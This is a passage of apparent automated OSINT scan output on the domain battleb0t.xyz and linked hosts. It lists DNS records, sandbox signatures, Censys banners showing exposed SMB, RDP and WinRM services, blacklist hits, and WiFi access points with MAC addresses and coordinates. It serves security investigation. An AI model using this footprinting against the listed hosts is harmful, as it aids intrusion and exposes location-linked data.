"FinancialCafeBlack-06_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "FinancialCafeWhite-07_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "imgggnew_1_.png" has type "PNG image data 1920 x 1699 8-bit colormap non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003376]\n "bootstrap.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "profiles_1_.png" has type "PNG image data 136 x 135 4-bit colormap non-interlaced"- [targetUID: N/A]\n "SSL-Certified-icons_1_.png" has type "PNG image data 131 x 50 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "TarFF3A.tmp" has type "data"- Location: [%TEMP%\\TarFF3A.tmp]- [targetUID: 00000000-00003376]\n "6IILQXTA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\6IILQXTA.txt]- [targetUID: 00000000-00003376]\n "pxiByp8kv8JHgFVrLDD4V1g_1_.woff" has type "Web Open Font Format TrueType length 65344 version 1.1"- [targetUID: N/A]\n "js_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "FRC8Z6SG.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\FRC8Z6SG.txt]- [targetUID: 00000000-00003264]\n "favicon_1_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "RecoveryStore._FED39B3D-CE42-11ED-A569-08002791028F_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "wallet_1_.png" has type "PNG image data 137 x 137 4-bit colormap non-interlaced"- [targetUID: N/A]\n "~DFBCF09A62309EF55B.TMP" has type "data"- Location: [%TEMP%\\~DFBCF09A62309EF55B.TMP]- [targetUID: 00000000-00003264]\n "iframeResizerDestination.min_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "TarFD53.tmp" has type "data"- Location: [%TEMP%\\TarFD53.tmp]- [targetUID: 00000000-00003376]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "jquery.org/license"\n Pattern match: "https://+c"\n Pattern match: "https://stats.g.doubleclick.net/j/collect"\n Pattern match: "https://ampcid.google.com/v1/publisher:getClientId"\n Pattern match: "https://cct.google/taggy/agent.js"\n Heuristic match: "* Copyright: (c) 2018 David J. Bradshaw - dave@bradshaw.net"\n Pattern match: "https://getbootstrap.com/"\n Pattern match: "https://github.com/twbs/bootstrap/graphs/contributors"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license"\n Pattern match: "https://github.com/twbs/bootstrap/blob/main/LICENSE"\n Pattern match: "www.microsoft.com0"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "https://fonts.googleapis.com/css2?family=Montserrat:wght@400;600;800&display=swap"\n Pattern match: "C.JgU/0$"\n Pattern match: "p6gu.gqN/\ufffd\ufffdm\ufffd/\u0225\ufffdy\ufffd]\ufffd\ufffd#\ufffd\ufffd\ufffd\ufffdh\ufffd\ufffd\ufffd\ufffd\u070f\ufffd\ufffdZ\ufffd*~\ufffd$O\ufffd\ufffd\ufffdA\ufffdd\ufffd7\ufffdH2oc\ufffd.v\ufffd\ufffdY#8i&2v\ufffd"\n Pattern match: "https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;800&display=swap"\n Pattern match: "MUID30D366FDCBF662572726741ECA726330msn.com/102513402695683110216750963867231023696*"\n Pattern match: ".2.733600913.1680102288financialcafe.net/1088321153638431170546345636378031023695*"\n Pattern match: ".2.733600913.1680102288financialcafe.net/1088321153638431170546345636378031023695*_gidGA1.2.1308012239.1680102288financialcafe.net/1088416549478431023896345636378031023695*"\n Pattern match: "https://www.google.com/ads/ga-audiences,a.google,c"\n Pattern match: "https://stats.g.doubleclick.net/j/collect,ca.U,ca"\n Pattern match: "https://www.google-analytics.com/analytics.js,k=c.F?rp(R(c,gaFunctionName)):rp();if(pa(k)){var"\n Pattern match: "www.google-analytics.com==a.host&& |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | NettWork2 (Net ID: 00:01:E3:0E:70:8B) | 50.1188, 8.6843 |
| 2023-05-12 03:09:41 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 124.48.229.35.bc.googleusercontent.com | 35.229.48.124 |
| 2023-05-12 03:24:22 | HTTP Status Code | No | Web Spider | 0 | 1 | 2 | 0 | None | 403 | http://ayhu.xyz/ |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Filmweb (Category: hobby)
https://www.filmweb.pl/user/login | login |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D1:67) | 32.8608, -79.9746 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | non-specified SSID !! (Net ID: 00:02:2D:8E:B2:0E) | 50.1188, 8.6843 |
| 2023-05-12 03:11:21 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 3 | 0 | None | {u'city': u'Frankfurt am Main', u'security': {u'is_vpn': False}, u'city_geoname_id': 2925533, u'region_geoname_id': 2905330, u'country': u'Germany', u'region': u'Hesse', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'DIGITALOCEAN-ASN', u'isp_name': u'DigitalOcean, LLC', u'organization_name': u'Digital Ocean', u'autonomous_system_number': 14061}, u'continent_code': u'EU', u'currency': {u'currency_name': u'Euros', u'currency_code': u'EUR'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/DE_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/DE_flag.png', u'unicode': u'U+1F1E9 U+1F1EA', u'emoji': u'\U0001f1e9\U0001f1ea'}, u'postal_code': u'60313', u'longitude': 8.6843, u'country_code': u'DE', u'timezone': {u'abbreviation': u'CEST', u'gmt_offset': 2, u'is_dst': True, u'name': u'Europe/Berlin', u'current_time': u'05:11:20'}, u'latitude': 50.1188, u'country_geoname_id': 2921044, u'continent_geoname_id': 6255148, u'country_is_eu': True, u'ip_address': u'46.101.229.70', u'continent': u'Europe', u'region_iso_code': u'HE'} | 46.101.229.70 |
| 2023-05-12 02:45:36 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 2 | 0 | None | frabjous-lebkuchen-324004.netlify.app | pics.battleb0t.xyz |
| 2023-05-12 02:44:15 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io | 185.199.111.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | LILLY_BURSA (Net ID: 00:1A:2A:05:D4:D0) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Dowling_Network (Net ID: 00:1D:D5:13:CA:40) | 32.8608, -79.9746 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f60465c67192a-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "DYNAMIC", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=B2wOcEimTwCYfDusQJnMA%2FeK3vnM4eWqJiKh4VAlhBD7SojZQVBe5%2BjFuHyHRbHO%2Fn1YBpE8RMXaJKVCk4v6MFKYjpbskikkKfgZLcaIJXgS5DpvLqiKf9pQvDmc23XPqbwOHpZdXJ%2FG\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html; charset=utf-8", "cf-ray": "7c5f60465c67192a-EWR"} |
| 2023-05-12 03:00:12 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | cpcalendars.ayhu.xyz | ayhu.xyz |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:41:52 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Content-Type: text/html; charset=us-ascii
Server: Microsoft-HTTPAPI/2.0
Date: <REDACTED>
Connection: close
Content-Length: 315
| 45.131.109.53 |
| 2023-05-12 03:41:58 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | vm.battleb0t.xyz | {"operating_system": {"vendor": "Microsoft", "product": "Windows", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*", "other": {"family": "Windows"}}, "last_updated_at": "2023-05-12T01:40:25.089Z", "ip": "45.131.109.53", "labels": ["file-sharing", "network-administration", "remote-access"], "location_updated_at": "2023-05-07T11:15:30.169008Z", "autonomous_system_updated_at": "2023-05-07T11:15:30.169132Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"vm.battleb0t.xyz": {"record_type": "A", "resolved_at": "2023-05-10T21:12:17.288943702Z"}, "11858-33959.pph-server.de": {"record_type": "A", "resolved_at": "2023-04-29T16:38:25.585351786Z"}, "wakapi.tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-29T14:27:35.242336552Z"}, "www.tt-dev.de": {"record_type": "CNAME", "resolved_at": "2023-01-05T14:36:51.431345945Z"}, "traefik.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-07T14:38:59.772471404Z"}, "tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-31T14:50:50.814184504Z"}, "test.tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-21T14:29:05.064783690Z"}, "wiki.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-08T14:20:13.917172001Z"}, "grafana.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-01T14:18:17.398732703Z"}, "70724-04381.pph-server.de": {"record_type": "A", "resolved_at": "2023-04-20T20:07:07.842037289Z"}, "npm.tt-dev.de": {"record_type": "A", "resolved_at": "2022-12-21T14:29:04.915388971Z"}, "portainer.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-14T14:32:52.020207987Z"}, "ci.tt-dev.de": {"record_type": "A", "resolved_at": "2023-01-06T14:26:38.984649398Z"}}, "names": ["traefik.tt-dev.de", "npm.tt-dev.de", "vm.battleb0t.xyz", "wakapi.tt-dev.de", "portainer.tt-dev.de", "ci.tt-dev.de", "tt-dev.de", "grafana.tt-dev.de", "test.tt-dev.de", "www.tt-dev.de", "wiki.tt-dev.de", "70724-04381.pph-server.de", "11858-33959.pph-server.de"], "reverse_dns": {"resolved_at": "2023-05-04T16:22:43.166057588Z", "names": ["vm.battleb0t.xyz"]}}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["file-sharing"], "truncated": false, "service_name": "SMB", "_decoded": "smb", "banner_hashes": ["sha256:51d9f41a595c653b76dbff0adeec37710decd99e91825ba2de9ef6e273bfcaf0"], "source_ip": "162.142.125.225", "extended_service_name": "SMB", "smb": {"smbv1_support": false, "negotiation_log": {"security_mode": 1, "system_time": 1683815217, "server_start_time": 1240428288, "_encoding": {"server_guid": "DISPLAY_HEX"}, "capabilities": 7, "server_guid": "0000000000000000000000000000000031a109594c6a1d49a3303a66d4c26ecb", "dialect_revision": 528, "authentication_types": ["1.3.6.1.4.1.311.2.2.30", "1.3.6.1.4.1.311.2.2.10"], "header_log": {"status": 0, "_encoding": {"protocol_id": "DISPLAY_HEX"}, "protocol_id": "00000000fe534d42", "credits": 1, "flags": 1, "command": 0}}, "smb_version": {"major": 2, "version_string": "SMB 2.1", "minor": 1, "revision": 0}, "session_setup_log": {"target_name": "70724-04381", "setup_flags": 0, "header_log": {"status": 3221225494, "_encoding": {"protocol_id": "DISPLAY_HEX"}, "protocol_id": "00000000fe534d42", "credits": 1, "command": 1, "flags": 1}, "negotiate_flags": 2726953477}, "smb_capabilities": {"smb_multicredit_support": true, "smb_persistent_handle_support": false, "smb_dfs_support": true, "smb_leasing_support": true, "smb_encryption_support": false, "smb_directory_leasing_support": false, "smb_multichan_support": false}, "has_ntlm": true}, "observed_at": "2023-05-11T14:26:57.515685601Z", "banner_hex": "534d4220534d4220322e31", "perspective_id": "PERSPECTIVE_HE", "transport_fingerprint": {"raw": "65535,128,true,MNWNNS,1460,false,false", "os": "Windows *", "id": 429}, "banner": "SMB SMB 2.1", "port": 445, "software": [{"vendor": "microsoft", "product": "windows", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:microsoft:windows:*:*:*:*:*:*:*:*", "source": "OSI_TRANSPORT_LAYER"}]}, {"tls": {"server_key_exchange": {"ec_params": {"named_curve": 24}}, "_encoding": {"ja3s": "DISPLAY_HEX"}, "version_selected": "TLSv1_2", "cipher_selected": "TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384", "certificates": {"_encoding": {"leaf_fp_sha_256": "DISPLAY_HEX"}, "leaf_data": {"pubkey_algorithm": "RSA", "public_key": {"key_algorithm": "RSA", "rsa": {"_encoding": {"modulus": "DISPLAY_BASE64", "exponent": "DISPLAY_BASE64"}, "length": 256, "modulus": "ruG0HFgv/8OXJWtxPCjUSQ85xDh2SJLByLm11c5cyZyMwJU/sWedNfO9DrevuT8F7VTYR5X9Jn9+NDXdfpZEQNy6zH+rYAiGSV94DzEOv8TqWPEo6TIzWBaS72PEIlTdq7nRnq7wO229GGWbClkbdw9qb1Ul/qbRHM7TT3kh7/gVKezZbTafnBnRnSghbqP3Z+9EoHVAitQl4NFBxkS94wX+pi5FPNe/dGPxT8v8SrvPl+DxkvgcVomdT3Gt7JTvfgjSWY2hJ5+d9dHNrgV4NShiaSBkDhIw3H44DQxJJGeOiPvGGMCLbHZIhhcbpYiP+//lXbcmsSe7v8Dij7/WiQ==", "exponent": "AAEAAQ=="}, "fingerprint": "46f940f431befbf3e8c0d41e66defd7ca5752176463e410bf7ff1a076f677750"}, "subject_dn": "CN=70724-04381.pph-server.de", "pubkey_bit_size": 2048, "fingerprint": "0565deb792f2ad55394185aaf708bacd5dc6cfd0a25654bbbd594714f6692ecc", "issuer_dn": "CN=70724-04381.pph-server.de", "names": ["70724-04381.pph-server.de"], "tbs_fingerprint": "103620f100eb7ba4c99aca138e14895b8d66946b6c6a90ced8fa2de351716b31", "subject": {"common_name": ["70724-04381.pph-server.de"]}, "signature": {"self_signed": true, "signature_algorithm": "SHA256-RSA"}, "issuer": {"common_name": ["70724-04381.pph-server.de"]}}, "leaf_fp_sha_256": "0565deb792f2ad55394185aaf708bacd5dc6cfd0a25654bbbd594714f6692ecc"}, "ja3s": "364ff14b04ef93c3b4cfa429d729c0d9"}, "_encoding": {"certificate": "DISPLAY_HEX"}, "_decoded": "rdp", "jarm": {"_encoding": {"cipher_and_version_fingerprint": "DISPLAY_HEX", "tls_extensions_sha256": "DISPLAY_HEX", "fingerprint": "DISPLAY_HEX"}, "cipher_and_version_fingerprint": "2ad2ad16d2ad2ad22c2ad2ad2ad2ad", "tls_extensions_sha256": "fd9c9d14e4f4f67f94f0359f8b28f532", "observed_at": "2023-04-25T19:43:40.097167804Z", "fingerprint": "2ad2ad16d2ad2ad22c2ad2ad2ad2adfd9c9d14e4f4f67f94f0359f8b28f532"}, "rdp": {"selected_security_protocol": {"tls": true, "raw_value": 1, "rdstls": false, "error_hybrid_required": false, "credssp_early_auth": false, "error_bad_flags": false, "error_ssl_forbidden": false, "error_ssl_cert_missing": false, "credssp": false, "error_ssl_user_auth_required": false, "error": false, "error_ssl_required": false, "standard_rdp": true, "error_unknown": false}, "protocol_flags": {"dynvc_graphics_pipeline": true, "neg_resp_reserved": true, "restricted_auth_mode": true, "restricted_admin_mode": true, "extended_client_data_supported": true}, "connect_response": {"connect_id": 0, "domain_parameters": {"max_mcspdu_size": 65528, "num_priorities": 1, "max_user_id_channels": 3, "domain_protocol_version": 2, "max_token_ids": 0, "max_provider_height": 1, "max_channel_ids": 34, "min_throughput": 0}}, "version": {"raw": 524299, "major": 10, "minor": 6}, "certificate_info": {}, "x224_cc_pdu_srcref": 13330}, "certificate": "0565deb792f2ad55394185aaf708bacd5dc6cfd0a25654bbbd594714f6692ecc", "truncated": false, "service_name": "RDP", "labels": ["remote-access", "network-administration"], "source_ip": "167.94.146.58", "extended_service_name": "RDP", "observed_at": "2023-05-11T13:18:54.374691218Z", "perspective_id": "PERSPECTIVE_TELIA", "transport_protocol": "TCP", "port": 3389, "transport_fingerprint": {"raw": "64000,128,true,MNWNNS,1460,false,false"}}, {"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "http": {"request": {"headers": {"_encoding": {"User_Agent": "DISPLAY_UTF8", "Accept": "DISPLAY_UTF8"}, "User_Agent": ["Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"], "Accept": ["*/*"]}, "method": "GET", "uri": "http://45.131.109.53:5985/"}, "response": {"body": "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\"\"http://www.w3.org/TR/html4/strict.dtd\">\r\n<HTML><HEAD><TITLE>Not Found</TITLE>\r\n<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\"></HEAD>\r\n<BODY><h2>Not Found</h2>\r\n<hr><p>HTTP Error 404. The requested resource is not found.</p>\r\n</BODY></HTML>\r\n", "_encoding": {"body": "DISPLAY_UTF8", "html_title": "DISPLAY_UTF8", "html_tags": "DISPLAY_UTF8", "body_hash": "DISPLAY_UTF8"}, "html_title": "Not Found", "protocol": "HTTP/1.1", "body_size": 315, "body_hashes": ["sha256:ce7127c38e30e92a021ed2bd09287713c6a923db9ffdb43f126e8965d777fbf0", "sha1:a66898b36c94c53766e66c1a7aaeb149447ec083"], "status_code": 404, "body_hash": "sha1:a66898b36c94c53766e66c1a7aaeb149447ec083", "headers": {"Content_Length": ["315"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["Microsoft-HTTPAPI/2.0"], "Connection": ["close"], "Content_Type": ["text/html; charset=us-ascii"], "Date": ["<REDACTED>"]}, "html_tags": ["<TITLE>Not Found</TITLE>", "<META HTTP-EQUIV=\"Content-Type\" Content=\"text/html; charset=us-ascii\">"], "status_reason": "Not Found"}, "supports_http2": false}, "truncated": false, "service_name": "HTTP", "_decoded": "http", "banner_hashes": ["sha256:d7de42c1e8c09cf951e3ad6248fda3ab48a60ca3eac8b25effd4b3067df8f362"], "source_ip": "162.142.125.216", "extended_service_name": "HTTP", "observed_at": "2023-05-12T01:02:37.678343941Z", "banner_hex": "485454502f312e3120343034204e6f7420466f756e640d0a436f6e74656e742d547970653a20746578742f68746d6c3b20636861727365743d75732d61736369690d0a5365727665723a204d6963726f736f66742d485454504150492f322e300d0a446174653a20203c52454441435445443e0d0a436f6e6e656374696f6e3a20636c6f73650d0a436f6e74656e742d4c656e6774683a203331350d0a", "perspective_id": "PERSPECTIVE_HE", "banner": "HTTP/1.1 404 Not Found\r\nContent-Type: text/html; charset=us-ascii\r\nServer: Microsoft-HTTPAPI/2.0\r\nDate: <REDACTED>\r\nConnection: close\r\nContent-Length: 315\r\n", "port": 5985, "software": [{"product": "Windows", "vendor": "Microsoft", "source": "OSI_APPLICATION_LAYER", "p |
| 2023-05-12 02:54:16 | Web Content | No | Web Spider | 1 | 0 | 2 | 0 | None | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="Cache-Control" content="no-cache">
<meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="mobile-web-app-capable" content="yes">
<link rel="apple-touch-icon" href="logo.png">
<link rel="icon" href="logo.png">
<title>WebGL Fluid Simulation</title>
<meta name="description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:type" content="website">
<meta property="og:title" content="Webgl Fluid Simulation">
<meta property="og:description" content="A WebGL fluid simulation that works in mobile browsers.">
<meta property="og:url" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/">
<meta property="og:image" content="https://paveldogreat.github.io/WebGL-Fluid-Simulation/logo.png">
<script type="text/javascript" src="dat.gui.min.js"></script>
<style>
* {
user-select: none;
}
html, body {
overflow: hidden;
background-color: #000;
}
body {
margin: 0;
position: fixed;
width: 100%;
height: 100%;
}
canvas {
width: 100%;
height: 100%;
}
.dg {
opacity: 0.9;
}
.dg .property-name {
overflow: visible;
}
@font-face {
font-family: 'iconfont';
src: url('iconfont.ttf') format('truetype');
}
.bigFont {
font-size: 150%;
color: #8C8C8C;
}
.cr.function.appBigFont {
font-size: 150%;
line-height: 27px;
color: #A5F8D3;
background-color: #023C40;
}
.cr.function.appBigFont .property-name {
float: none;
}
.cr.function.appBigFont .icon {
position: sticky;
bottom: 27px;
}
.icon {
font-family: 'iconfont';
font-size: 130%;
float: right;
}
.twitter:before {
content: 'a';
}
.github:before {
content: 'b';
}
.app:before {
content: 'c';
}
.discord:before {
content: 'd';
}
</style>
</head>
<body>
<canvas></canvas>
<script src="./script.js"></script>
</body>
</html> | oldfluid.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RossAviation206 (Net ID: 00:0C:42:6C:BE:A6) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.65 | 34.74.170.74 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <hidden ssid> (Net ID: 00:01:E3:54:AE:E3) | 52.3759, 4.8975 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.38): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:11:17 | Physical Coordinates | No | AbstractAPI | 90 | 0 | 2 | 0 | None | 52.3759, 4.8975 | 188.114.96.1 |
| 2023-05-12 02:52:59 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://www.battleb0t.xyz", "firewall": "Fastly", "detected": true, "manufacturer": "Fastly CDN"}, {"url": "https://www.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | www.battleb0t.xyz |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.51): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:13:09 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [01010101lzy.github.io]
https://www.openphish.com/feed.txt | 01010101lzy.github.io |
| 2023-05-12 02:45:48 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://traderai.space/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d08_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d08_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_d08_IESQMMUTEX_0_519"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_d08_ConnHashTable<3336>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_d08_IE_EarlyTabStart_0xd2c_Mutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_d08_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3336"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"191.101.2.55:443"\n "172.217.12.106:443"\n "151.101.1.229:443"\n "185.199.111.153:443"\n "142.251.46.227:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdn.jsdelivr.net"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "threejs.org"\n "traderai.space"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB2B0.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarB240.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00001016]\n "CabB29F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB29F.tmp]- [targetUID: 00000000-00001016]\n "CabB230.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\CabB230.tmp]- [targetUID: 00000000-00001016]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "TarB2B0.tmp" has type "data"- Location: [%TEMP%\\TarB2B0.tmp]- [targetUID: 00000000-00001016]\n "KFOlCnqEu92Fr1MmWUlvAA_1_.woff" has type "Web Open Font Format TrueType length 65556 version 1.1"- [targetUID: N/A]\n 